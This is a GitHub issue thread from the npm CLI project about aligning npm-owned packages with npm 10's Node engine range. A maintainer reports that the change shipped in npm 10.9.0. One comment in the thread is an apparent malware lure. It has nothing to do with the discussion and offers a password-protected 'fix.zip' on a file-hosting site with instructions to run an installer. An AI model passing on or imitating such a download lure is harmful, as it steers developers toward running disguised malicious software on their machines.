### ISSUE TITLE
Align npm packages to npm 10's node engine range

### ISSUE THREAD

**Issue by hashtagchris** [npm/cli#7754]
The Node 14 and 16 releases are no longer supported ([docs](https://nodejs.org/en/about/previous-releases)). Packages npm is dependent on have started releasing versions that don't work with Node <=14.17.0. Packages still supporting an older engine range aren't consuming the latest bug fixes and improvements made to dependencies.

Let's update npm-owned packages to have the same `engines.node` version range as the cli: https://github.com/npm/cli/blob/e674987c8dc5634c3b2a8a4d0f024d15041ba23c/package.json#L260-L262

### References

https://github.com/isaacs/minipass/issues/56
https://github.com/npm/map-workspaces/pull/158

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by wraithgar** [comment]
PHEW, This all shipped with npm [`10.9.0`](https://github.com/npm/cli/blob/latest/CHANGELOG.md#1090-2024-10-03)
